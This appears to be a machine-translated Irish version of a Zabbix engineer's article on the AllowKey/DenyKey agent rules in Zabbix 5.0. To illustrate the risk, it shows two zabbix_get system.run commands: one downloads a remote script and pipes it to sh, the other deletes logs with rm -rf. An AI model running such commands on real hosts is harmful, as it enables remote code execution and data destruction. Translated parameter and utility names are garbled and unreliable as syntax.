Tacaíocht liosta dubh agus bánliosta le haghaidh méadracht gníomhaire-taobh i Zabbix 5.0

Tacaíocht liosta dubh agus bánliosta do mhéadracht gníomhaire-taobh

Tikhon Uskov, Innealtóir Comhtháthaithe, Zabbix

Saincheisteanna slándála sonraí

Tá gné nua ag Zabbix 5.0 a ligeann duit slándáil a fheabhsú i gcórais a úsáideann Zabbix Agent agus a chuirtear in ionad an tseanpharaiméadair CumasaighRemoteCommands.

Eascraíonn feabhsuithe ar shlándáil córas gníomhairebhunaithe as an bhfíric gur féidir le gníomhaire líon mór gníomhartha a d'fhéadfadh a bheith contúirteach a dhéanamh.

• Is féidir leis an ngníomhaire beagnach aon fhaisnéis a bhailiú, lena n-áirítear faisnéis rúnda nó a d'fhéadfadh a bheith contúirteach, ó chomhaid chumraíochta, comhaid logála, comhaid phasfhocal, nó aon chomhaid eile.

Mar shampla, ag baint úsáide as an áirgiúlacht zabbix_get is féidir leat rochtain a fháil ar liosta na n-úsáideoirí, a n-eolairí baile, comhaid phasfhocal, etc.

Rochtain a fháil ar shonraí leis an áirgiúlacht zabbix_get

NÓTA. Ní féidir sonraí a aisghabháil ach amháin má tá cead léite ag an ngníomhaire ar an gcomhad comhfhreagrach. Ach, mar shampla, an comhad /etc/passwd/ inléite ag gach úsáideoir.

• Is féidir leis an ngníomhaire orduithe a d'fhéadfadh a bheith contúirteach a fhorghníomhú freisin. Mar shampla, eochair *córas.rith[Ligeann ]** duit aon orduithe cianda a fhorghníomhú ar nóid líonra, lena n-áirítear scripteanna a rith ó chomhéadan gréasáin Zabbix a fhorghníomhaíonn orduithe ar thaobh an ghníomhaire freisin.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• Ar Linux, ritheann an gníomhaire de réir réamhshocraithe gan pribhléidí fréimhe, agus ar Windows ritheann sé mar sheirbhís mar Chóras agus tá rochtain neamhshrianta aige ar an gcóras comhad. Dá réir sin, mura ndéantar aon athruithe ar pharaiméadair Ghníomhaire Zabbix tar éis a shuiteáil, tá rochtain ag an ngníomhaire ar an gclárlann, ar an gcóras comhaid agus is féidir leis fiosrúcháin WMI a fhorghníomhú.

I leaganacha níos luaithe an paraiméadar EnableRemoteCommands=0 ní cheadaítear ach méadracht a dhíchumasú leis an eochair *córas.rith[]** agus scripteanna a rith ón gcomhéadan gréasáin, ach ní raibh aon bhealach ann rochtain ar chomhaid aonair a shrianadh, eochracha aonair a suiteáladh leis an ngníomhaire a cheadú nó a dhíchumasú, nó teorainn a chur le húsáid paraiméadair aonair.

Ag baint úsáide as an paraiméadar EnableRemoteCommand i leaganacha níos luaithe de Zabbix

Ceadaigh Eochair/DenyKey

Cuidíonn Zabbix 5.0 le cosaint a dhéanamh ar rochtain neamhúdaraithe den sórt sin trí liostaí bána agus liostaí dubha a sholáthar chun méadracht a cheadú agus a dhiúltú ar thaobh an ghníomhaire.

In Zabbix 5.0 gach eochair, lena n-áirítear *córas.rith[]** cumasaithe, agus cuireadh dhá rogha cumraíochta gníomhaire nua leis:

Ceadaigh Eochair= — seiceálacha ceadaithe;

Diúltaigh= — seiceálacha toirmiscthe;

áit a bhfuil patrún ainm eochrach le paraiméadair a úsáideann meiteacharacters (*).

Ligeann na heochracha AllowKey agus DenyKey duit méadracht aonair a cheadú nó a dhiúltú bunaithe ar phatrún ar leith. Murab ionann agus paraiméadair chumraíochta eile, níl teorainn le líon na bparaiméadar AllowKey/DenyKey. Ligeann sé seo duit a shainiú go soiléir cad go díreach is féidir leis an ngníomhaire a dhéanamh sa chóras trí chrann seiceálacha a chruthú - eochracha inrite, áit a bhfuil ról an-tábhachtach ag an ord ina bhfuil siad scríofa.

Seicheamh na rialacha

Déantar na rialacha a sheiceáil san ord ina gcuirtear isteach sa chomhad cumraíochta iad. Déantar an eochair a sheiceáil de réir na rialacha roimh an gcéad chluiche, agus chomh luath agus a mheaitseálann eochair an eilimint sonraí an patrún, ceadaítear nó diúltaítear é. Tar éis seo, stopann seiceáil na rialacha agus déantar neamhaird ar na heochracha atá fágtha.

Mar sin, má mheaitseálann eilimint riail cheadaithe agus shéanadh, braithfidh an toradh ar an riail atá sa chomhad cumraíochta ar dtús.

2 rialacha éagsúla leis an patrún céanna agus eochair vfs.file.size[/tmp/file]

An t-ord ina n-úsáidtear na heochracha AllowKey/DenyKey:

1. rialacha cruinn,
2. rialacha ginearálta,
3. riail choisctheach.

Mar shampla, má theastaíonn uait rochtain ar chomhaid i bhfillteán áirithe, ní mór duit rochtain a cheadú orthu ar dtús, agus ansin gach rud eile nach dtagann faoi na ceadanna bunaithe a dhiúltú. Má úsáidtear an riail séanadh ar dtús, diúltófar rochtain ar an bhfillteán.

Seicheamh ceart

Más gá duit 2 fhóntas a cheadú chun rith trí *córas.rith[]**, agus déanfar an riail shéanadh a shonrú ar dtús, ní sheolfar na fóntais, toisc go mbeidh an chéad patrún ag teacht le haon eochair i gcónaí, agus déanfar neamhaird ar na rialacha ina dhiaidh sin.

Seicheamh mícheart

Patrúin

Rialacha bunúsacha

Is léiriú é patrún le saoróga. Meaitseálann an meiteacharacter (*) líon ar bith de charachtair ar bith ag suíomh ar leith. Is féidir meiticharacters a úsáid san eochairainm agus i bparaiméadar. Mar shampla, is féidir leat an chéad pharaiméadar a shainiú go docht le téacs, agus sonraigh an ceann ina dhiaidh sin mar shaoróg.

Ní mór paraiméadair a chur faoi iamh idir lúibíní cearnacha [].

• system.run[* - mícheart
• vfs.file*.txt] - mícheart
• vfs.file.*[*] - ceart

Samplaí d'úsáid saoróg.

1. Sa phríomhainm agus sa pharaiméadar. Sa chás seo, ní fhreagraíonn an eochair d'eochair den chineál céanna nach bhfuil paraiméadar ann, ós rud é sa phátrún chuireamar in iúl gur mhaith linn críoch áirithe den ainm eochair agus sraith áirithe paraiméadair a fháil.
2. Mura n-úsáideann an patrún lúibíní cearnacha, ceadaíonn an patrún na heochracha go léir nach bhfuil paraiméadair iontu agus diúltaíonn sé gach eochair ina bhfuil an paraiméadar sonraithe.
3. Má scríobhtar an eochair ina hiomláine agus má shonraítear na paraiméadair mar shaoróg, meaitseálfaidh sí eochair ar bith dá samhail le paraiméadair ar bith agus ní mheaitseálfaidh sí an eochair gan lúibíní cearnacha, i.e. ceadófar nó diúltófar í.

Rialacha maidir le paraiméadair a líonadh.

• Má tá eochair le paraiméadair beartaithe le húsáid, ní mór na paraiméadair a shonrú sa chomhad cumraíochta. Ní mór paraiméadair a shonrú mar mheitecharacter. Is gá rochtain ar aon chomhad a dhiúltú go cúramach agus a chur san áireamh cén fhaisnéis is féidir leis an méadrach a sholáthar faoi litrithe éagsúla - le paraiméadair agus gan paraiméadair.

Gnéithe na n-eochracha scríbhneoireachta le paraiméadair

• Má shonraítear eochair le paraiméadair, ach go bhfuil na paraiméadair roghnach agus sonraithe mar mheiteashonraí, déanfar eochair gan paraiméadair a réiteach. Mar shampla, más mian leat faisnéis a fháil faoin ualach ar an LAP a dhíchumasú agus a shonrú gur cheart an eochair system.cpu.load[*] a dhíchumasú, ná déan dearmad go dtabharfaidh an eochair gan paraiméadair an meánluach ualaigh ar ais.

Rialacha maidir le paraiméadair a líonadh

Nótaí

coigeartú

• Ní féidir leis an úsáideoir roinnt rialacha a athrú, mar shampla, rialacha fionnachtana nó rialacha um uathchlárú gníomhairí. Ní chuireann rialacha AllowKey/DenyKey isteach ar na paraiméadair seo a leanas:
  - ÓstainmItem
  - HostMetadataItem
  - HostInterfaceItem

NÓTA. Má dhíchumasaíonn riarthóir eochair, nuair a cheistítear é, ní sholáthraíonn Zabbix faisnéis faoin bhfáth go dtagann an méadrach nó an eochair sa chatagóir 'GAN TACAÍOCHT'. Ní thaispeántar faisnéis faoi thoirmisc ar chianorduithe a fhorghníomhú i gcomhaid logála an ghníomhaire ach oiread. Is ar chúiseanna slándála atá sé seo, ach d'fhéadfadh sé go ndéanfadh sé casta dífhabhtaithe má thiteann an mhéadracht isteach i gcatagóir nach dtacaítear léi ar chúis éigin.

• Níor cheart duit brath ar aon ordú sonrach chun comhaid chumraíochta seachtracha a nascadh (mar shampla, in ord aibítre).

Fóntais líne ordaithe

Tar éis duit na rialacha a bhunú, ní mór duit a chinntiú go bhfuil gach rud cumraithe i gceart.

Is féidir leat ceann amháin de thrí rogha a úsáid:

• Cuir méadrach le Zabbix.
• Tástáil le zabbix_agentd. Zabbix gníomhaire le rogha -chló (-p) léiríonn na heochracha go léir (a cheadaítear de réir réamhshocraithe) ach amháin iad siúd nach bhfuil ceadaithe ag an chumraíocht. Agus leis an rogha -tástáil (-t) óir fillfidh eochair toirmiscthe 'Eochair mhíre nach dtacaítear léi'.
• Tástáil le zabbix_fháil. Fóntas zabbix_fháil le rogha -k fillfidh 'ZBX_NOTSUPPORTED: Méadracht anaithnid'.

Ceadaigh nó a dhiúltú

Is féidir leat rochtain ar chomhad a dhiúltú agus a fhíorú, mar shampla, ag baint úsáide as an bhfóntas zabbix_fháilgo ndiúltaítear rochtain ar an gcomhad.

**

NÓTA. Ní thugtar aird ar shleachta sa pharaiméadar.

Sa chás seo, féadfar rochtain ar chomhad den sórt sin a cheadú trí chonair eile. Mar shampla, má bhíonn nasc simplí mar thoradh air.

Moltar roghanna éagsúla a sheiceáil chun na rialacha sonraithe a chur i bhfeidhm, agus na féidearthachtaí a bhaineann le dul timpeall ar na toirmisc a chur san áireamh freisin.

Ceisteanna agus Freagraí

Ceist. Cén fáth ar roghnaíodh patrún chomh casta lena theanga féin chun cur síos a dhéanamh ar rialacha, ceadanna agus toirmisc? Cén fáth nach raibh sé indéanta, mar shampla, na habairtí rialta a úsáideann Zabbix a úsáid?

Freagair. Is saincheist feidhmíochta regex é seo toisc nach mbíonn ach gníomhaire amháin ann de ghnáth agus seiceálann sé líon mór méadrachta. Is oibríocht throm go leor é Regex agus ní féidir linn na mílte méadracht a sheiceáil ar an mbealach seo. Wildcards - réiteach uilíoch, a úsáidtear go forleathan agus simplí.

Ceist. Nach bhfuil na comhaid Include in ord aibítre?

Freagair. Chomh fada agus is eol dom, tá sé beagnach dodhéanta an t-ord ina gcuirfear rialacha i bhfeidhm a thuar má scaipeann tú na rialacha ar chomhaid éagsúla. Molaim gach riail AllowKey/DenyKey a bhailiú i gcomhad amháin Áirigh, toisc go n-idirghníomhaíonn siad lena chéile, agus an comhad seo san áireamh.

Ceist. In Zabbix 5.0 an rogha 'EnableRemoteCommands=' ar iarraidh ón gcomhad cumraíochta, agus níl ach AllowKey/DenyKey ar fáil?

Freagra. Seá sin ceart.

Go raibh maith agat as bhur n-aire!

Foinse: will.com